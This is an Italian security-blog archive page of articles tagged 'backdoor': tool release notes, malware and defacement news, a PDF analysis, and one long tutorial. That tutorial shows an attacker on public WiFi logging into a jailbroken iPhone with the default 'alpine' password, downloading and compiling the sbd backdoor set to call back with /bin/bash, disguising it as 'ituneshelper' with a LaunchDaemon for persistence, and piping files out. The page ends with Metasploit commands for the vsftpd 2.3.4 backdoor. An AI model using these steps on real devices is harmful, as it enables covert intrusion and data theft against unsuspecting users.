Articoli

weevely

Weevely è un software scritto in Python da Emilio Pinna, i primi giorni di Febbraio ha raggiunto la versione 1.0 permettendo di creare shell PHP e gestirle remotamente.

In quest’ultima versione vengono introdotte le seguenti caratteristiche:

  • Supports of Windows and MacOS hosts environments
  • Module :net.mount, powered by HTTPfs, that mounts automagically remote filesystem to a local mountpoint
  • Module :file.edit to edit remote files with your favourite local text editor
  • Module :audit.systemfiles to find system files with bad permissions that could affect server security
  • Module :audit.phpconf to audit common PHP misconfiguration
  • SOCKS4 and SOCKS5 proxy supports
  • Totally rewritten module base structure to simplify module deploying
  • Modules arguments managament with argparse
  • Tons of bug fixes

Infine vi ricordo che Weevely è già disponibile nella distribuzione BackBox in alternativa potete trovare il software e il codice sorgente sulla pagina ufficiale di GitHub.

Weevely, per chi ancora non lo conoscesse, è un generatore di Backdoor PHP sviluppato dal nostro compaesano Emilio Pinna. Il software Weevely permette quindi di creare un ambiente simile ad una shell SSH/Telnet per acconsentirci di eseguire comandi sul server remoto, nonostante funzioni in ambiente PHP il software tenta diversi approcci per fornire all’utente una shell funzionante con i maggiori permessi ottenibili.

Recentemente Weevely si è aggiornato alla versione 0.7.1 recependo il seguente changelog:

  • net.proxy module forwards your HTTP traffic trough remote target machine as a real proxy. First run :net.proxy, then set ‘http://localhost:8080′ as HTTP proxy in your favourite web browser and browse anonymously through target web server.
  • net.php_proxy module installs a PHP script to browse anonymously through remote target machine.
  • net.scan module performs port scan from your target web server
  • file.rm module removes files and directories, also in restricted PHP enviroinments

Weevely lo trovate preinstallato nella famosa distribuzione di Pen Testing BackBox, oppure lo potere scaricare attraverso il sito internet ufficiale. Dopo il salto vi lasciamo con una breve video guida dimostrativa.

Continua a leggere

Il blog Coresec ha recentemente pubblicato una interessante guida su come installare una Backdoor permanente su un dispositivo iOS (iPhone, iPod Touch e iPad) a patto che il sistema sia stata Jailbrekkato e quindi vi siano attivi i permessi di root.

Molti utenti effettuando la procedura di Jailbreak per avere facilmente accesso ai propri file o alle applicazioni (per poi essere illegalmente copiate), questa procedura prevede l’installazione del pacchetto OpenSSH che permette di accedere remotamente al dispositivo tramite una semplice sessione SSH. Purtroppo gli utenti incuranti della sicurezza non procedono a cambiare la password di default (alpine) e quindi basta ritrovarsi collegati ad una rete wireless pubblica per essere una probabile vittima di un attaccante.

In questo articolo supponiamo che Mario abbia effettuato il Jailbreak del suo iPhone, installato OpenSSH senza cambiare la password di default e si trova all’Università dove è disponibile una rete WiFi pubblica senza alcuna protezione di tipo “Client Isolation”.

L’attaccante procederà ad una scansione di rete all’interno della rete WiFi dell’università, individuerà l’iPhone di Mario con il quale aprirà semplicemente una sessione SSH. Successivamente procederà all’installazione della Backdoor sbd-1.36 sviluppata da Michel Blomgren.

Una volta aperta la sessione SSH procediamo all’installazione ed esecuzione delle pacchetto iphone-gcc

iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...

iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...

iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...

Scarichiamo ed estraiamo la Backdoor

iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43-- http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================>] 84,093 66.3K/s in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe

iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------ 3 1000 100 748 Sep 17 2004 ./
drwxr-x--- 6 root wheel 272 Apr 23 23:50 ../
-rw------- 1 1000 100 1876 Sep 17 2004 CHANGES
-rw------- 1 1000 100 18007 Jun 8 2004 COPYING
-rw------- 1 1000 100 2176 Jun 20 2004 Makefile
-rw------- 1 1000 100 4880 Sep 11 2004 README
-rw------- 1 1000 100 31370 Jun 12 2004 aes.c
-rw------- 1 1000 100 549 Jun 11 2004 aes.h
drwx------ 2 1000 100 136 Sep 11 2004 binaries/
-rw------- 1 1000 100 77 Jun 2 2004 doexec.c
-rw------- 1 1000 100 7114 Sep 11 2004 doexec_unix.h
-rw------- 1 1000 100 19060 Sep 8 2004 doexec_win32.h
-rw------- 1 1000 100 14968 Sep 9 2004 misc.h
-rwx------ 1 1000 100 624 Jun 13 2004 mktarball.sh*
-rw------- 1 1000 100 13381 Sep 8 2004 pel.c
-rw------- 1 1000 100 898 Sep 9 2004 pel.h
-rw------- 1 1000 100 9829 Sep 9 2004 readwrite.h
-rw------- 1 1000 100 20557 Sep 9 2004 sbd.c
-rw------- 1 1000 100 2014 Jun 8 2004 sbd.h
-rw------- 1 1000 100 8900 Jun 2 2004 sha1.c
-rw------- 1 1000 100 436 Jun 2 2004 sha1.h
-rw------- 1 1000 100 20800 Sep 9 2004 socket_code.h

Procediamo alla configurazione della Backdoor (esecuzione come demone, indirizzo ip, porta, password, impostazioni di crittografia, ecc ecc).

iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
* reconnect every 10 seconds.
*/

#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"

Compiliamo SBD

<pre>iphone4:~/sbd-1.36 root# make
usage:
make unix - Linux, NetBSD, FreeBSD, OpenBSD
make sunos - SunOS (Solaris)
make win32 - native win32 console app (w/ Cygwin + MinGW)
make win32bg - create a native win32 no-console app (w/ Cygwin + MinGW)
make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
make mingw - native win32 console app (w/ MinGW MSYS)
make mingwbg - native win32 no-console app (w/ MinGW MSYS)
make cygwin - Cygwin console app
make darwin - Darwin

iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd

iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*

Impostiamo l’avvio automatico della Backdoor attraverso LaunchDaemons

iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.ituneshelper.start</string>
<key>ProgramArguments</key>
<array>
<string>/usr/bin/ituneshelper</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>1</integer>
</dict>
</plist>
EOF

iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x 2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r-- 1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r-- 1 root wheel 847 Feb 15 2011 com.openssh.sshd.plist

L’installazione della Backdoor è conclusa, procediamo quindi a testare la connessione dal nostro PC

[email protected]:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux

[email protected]:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e  
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)

[email protected]:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef

bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin

Se per esempio vogliamo trasferire un file dal dispositivo

[email protected]:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file

iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345

Infine vi riportiamo la procedura per disinstallare la Backdoor

iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper

All’inizio di questo mese i ricercatori di AlienVault e Intego hanno rilevato un nuovo attacco che ha colpito l’organizzazione non governativa ONG Tibetana. L’attacco permetteva attraverso la visita dell’utente ad un sito Web dannoso lo sfruttamene della vulnerabilità Java CVE-2011-3544 per eseguire un Payload sul terminale della vittima.

Il Payload provvedeva a caricare nei sistemi Windows una variante del trojan Gh0st RAT, ma con sorpresa caricava nei sistemi Mac OS X un nuovo payload chiamato OSX/Lamadai.A.

Il Payload OSX/Lamadai.A ha lo scopo di infettare tutti i documenti di Microsoft Word, il trojan si attiverà all’apertura dei documenti inviando ad un server Cinese informazioni private quali IP, Nome del mac, username e password. Lo scopo è chiaramente quello di rubare informazioni private attraverso la creazione di una backdoor nel proprio terminale.
Il consiglio è quindi quello di aggiornare quanto prima il pacchetto di Microsoft Office per MAC.

NullSecurity Team ha rilasciato la prima versione del software Trixd00r un avanzato ed invisibile sistema di backdoor TCP/IP per sistemi Unix, la piattaforma è costituita da un client e un server quest’ultimo attenderà di sniffare dei pacchetti dedicati sulla rete. Se un pacchetto generato dal client viene rilevato al server viene allora catturato e sfruttato per una shell tramite i protocolli TCP e UDP.

È possibile scaricare Trixd00r sul sito internet ufficiale, mentre dopo il salto trovate un video dimostrativo.

Continua a leggere

CloseTheDoor è una nuova Utility dedicata al mondo Microsoft Windows in grado di elencarci tutte le porte attualmente in uso dal sistema con i rispettivi dettagli:

  • Interfaccia IP;
  • Porta;
  • Protocollo (TCP, UDP);
  • Nome del Processo;
  • PID, nome del processo;
  • Servizio Associato alla porta;
  • Sviluppatore e Descrizione del servizio.

Il software può tornare utile nel caso volessimo fare un’attenta analisi sul terminale ed individuare eventuali processi nascosti che generano traffico a nostra insaputa, classico esempio può essere una backdoor sfruttata da un malintenzionato per accedere illegittimamente al terminale.

CloseTheDoor è un software distribuito gratuitamente in versione permanente o portatile, è possibile scaricarlo attraverso il sito ufficiale ospitato da SourceForge.

Un estate di fuoco per chi si occupa di sicurezza! Il giorno 1 Agosto il sito www.backbox.org è stato defacciato da un gruppo di cracker iraniani conosciuti con lo pseudonimo di eMP3R0r TEAM. La loro pagina è rimasta online per circa 2 ore prima che il sito venisse ripristinato. In verità la vicenda ha dei risvolti clamorosi, come emerge dal comunicato stampa rilasciato dal Team di BackBox. Il problema era dovuto ad una errata configurazione del server condiviso del noto provider italiano Netsons che per diversi giorni ha esposto le home di migliaia di utenti agli attacchi dei cracker! Per nostra fortuna backbox.org è stato l’unico sito a subire il deface ma non è da escludere che i dati di altri siti siano stati trafugati per attacchi futuri. Dall’analisi condotta dal team di BackBox ben 5000 account erano vulnerabili!

L’attacco è partito da un sito web con una installazione insicura di Joomla residente sullo stesso server condiviso, per stessa ammissione di Netsons il server HP4. I cracker dopo aver sfruttato un bug di Joomla hanno caricato una webshell grazie alla quale hanno avuto accesso alla home di backbox.org. “Stranamente” da diversi giorni tutte le home degli account hostati sul server condiviso potevano essere navigate senza alcuna restrizione da qualsiasi utente! I cracker ottenuti i dati relativi all’installazione del forum di BackBox (SMF) e utilizzando la stessa webshell, non hanno avuto problemi a modificare il record del database MySQL relativo all’account admin ottenendo cosi accesso al pannello di amministrazione del forum. Il passo successivo è stato caricare una backdoor nella home di backbox.org che hanno poi utilizzato per modificare i files index.php del sito.

La vulnerabilità è stata individuata da Raffaele Forte esperto di sicurezza e responsabile del progetto BackBox Linux. Da una sua dichiarazione risulta che il provider italiano è intervenuto a fixare il problema solo dopo che lui stesso abbia dato dimostrazione di come i dati dei loro utenti fossero liberamente accessibili. Dalla prima segnalazione sono passati ben cinque giorni prima che Netsons prendesse in considerazione quanto denunciato dal Team di BackBox. Stando alle dichiarazioni del provider sembra che il problema sia stato causato da un aggiornamento ad una nuova versione di php. In breve i permessi della directory “public_html” dei vari account sono stati impostati con valori errati spalancando le porte ai cracker iraniani.

Alla luce dei fatti la vicenda ha avuto dei risvolti drammatici per come è stata gestita dall’ISP italiano. Essendo un hosting condiviso la responsabilità dell’accaduto non è certo del Team di BackBox il quale, nonostante il rifiuto da parte di Netsons di fornirgli i log degli accessi al loro sito, hanno avviato una indagine interna che ha poi portato a risolvere il problema. Ci chiediamo come si sarebbe evoluta la vicenda se il Team di BackBox si fosse limitato solo a ripristinare il loro sito. Avremmo forse assistito al piu grande un “mass defacement” della storia dei provider italiani? La cosa inquietante è che ad oggi nessuna comunicazione ufficiale è stata rilasciata da Netsons che a questo punto sembra voler nascondere l’intera vicenda. Invitiamo pertanto tutti gli utenti ad effettuare un backup preventivo e cambiare le password di accesso ai loro siti.

Il mistero sui file sottratti al CNAIPIC è sempre più fitto, la paternità del reato è stata recentemente attribuita alla Crew NKWT Load dopo la rivendicazione originale del team Anonymous, con le relative perplessità che ne derivano.

Alla ricerca di maggiori informazioni mi sono imbattuto in un messaggio ufficiale dell’Operation Payback ITA che testualmente riportava:

Continuando a leggere la discussione, diverse personalità riferiscono che i file PDF conterrebbe uno script in grado di inviare dati sensibili dell’utente ad un server non identificato.

Incuriosito ancor di più sul fatto ho provveduto a scaricare i tre archivi fino ad oggi distribuiti (reperibili nel blog ufficiale) e ad analizzarli.

Tecnica

Per attuare l’analisi ho utilizzato:

  • BackBox come server proxy di Adobe Reader mediante il software Zaproxy;
  • Windows XP con due sessioni di Nestat avviate e Flidder 2.

Video Analisi

Mi scuso per la qualità del video (la tastiera non è sincronizzata) ma purtroppo il software di Video Recording non è completamente compatibile con il recente aggiornamento di Mac OS X Lion.

Analisi

Una volta avviato il server proxy, netstat e aperto Flindder (in grado di analizzare il traffico di Adobe Reader) ho aperto singolarmente ogni file PDF sottratto dai server del CNAIPIC.

L’analisi ha avuto esito negativo, non risulterebbe nessuna connessione esterna all’apertura dei file PDF.

Conclusioni

Personalmente non voglio smentire gli Anonymous, sicuramente hanno le loro ragioni per aver scritto quel messaggio, ma i fatti non rilevano nessuna backdoor o script malevoli.

Note

I file analizzati contenunti nelle prime due directory sono stati prelevati dal messaggio originale del 24 Luglio 2011, ancor prima che gli Anonymous Italiani rilasciassero il loro comunicato stampa e che provvedessero alla “bonifica” dei file.

Versione:
vsftpd-2.3.4 del 30/06/2011

Dimostrazione Metasploit:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a